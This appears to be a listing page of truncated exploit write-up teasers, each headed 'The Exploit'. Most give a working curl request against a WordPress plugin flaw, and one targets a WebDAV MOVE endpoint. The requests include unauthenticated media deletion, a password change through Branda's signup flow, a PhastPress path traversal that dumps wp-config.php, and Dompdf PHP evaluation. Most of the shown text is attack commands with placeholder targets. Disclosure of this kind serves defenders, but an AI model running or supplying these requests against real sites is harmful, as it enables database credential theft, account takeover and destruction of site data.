## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...
## The Exploit Unauthenticated attackers can delete any media attachment by POSTing the attachment ID to the exposed REST endpoint. ```bash curl -i -X POST "https://target.example.com/wp-json/bfe/v1/revert" \ -H "Content-Type: text/plai...
Read article →## The Exploit Attacker needs any authenticated WordPress account with Subscriber-level access or higher. ```bash curl -i -X POST "https://TARGET/wp-admin/admin-ajax.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Co...
Read article →## The Exploit Unauthenticated attacker can delete arbitrary media attachments by POSTing `attachments_to_delete[]` directly to the plugin's AJAX submit endpoint. ```bash curl -s -X POST 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Co...
Read article →## The Exploit Authenticated Contributor-level attacker. ```bash curl -i -X POST 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'action=smack_upload&securekey=NONCE_VALUE&url=h...
Read article →## The Exploit Unauthenticated attackers can abuse the Branda login-screen signup-password flow to change a user password by POSTing `password_1` and an activation `key`. ```bash curl -i -s -X POST 'https://TARGET/wp-login.php?action=acti...
Read article →## The Exploit Unauthenticated attacker only needs `media_id` and the attachment upload timestamp to delete any attachment. ```bash TARGET=https://TARGET_HOST MEDIA_ID=123 MEDIA_KEY=$(python3 - <<'PY' import hashlib print(hashlib.md5(b"17...
Read article →## The Exploit Attacker needs authenticated Contributor-level access or above. ```bash curl -i -X POST "https://TARGET_HOST/wp-admin/admin-ajax.php?action=elementor_ajax_save" \ -H "Content-Type: application/x-www-form-urlencoded" \ -...
Read article →## The Exploit No authentication is required. ```bash curl -i 'http://TARGET/wp-content/plugins/phastpress/sdk/phast.php?url=/wp-config.php%2500.txt' ``` The vulnerable server returns HTTP 200 and dumps the contents of `wp-config.php` in...
Read article →## The Exploit An unauthenticated attacker can force the plugin to render attacker-supplied HTML through Dompdf with PHP evaluation enabled. ```bash curl -sS -X POST "http://TARGET/wp-admin/admin-ajax.php" \ -H "Content-Type: applicatio...
Read article →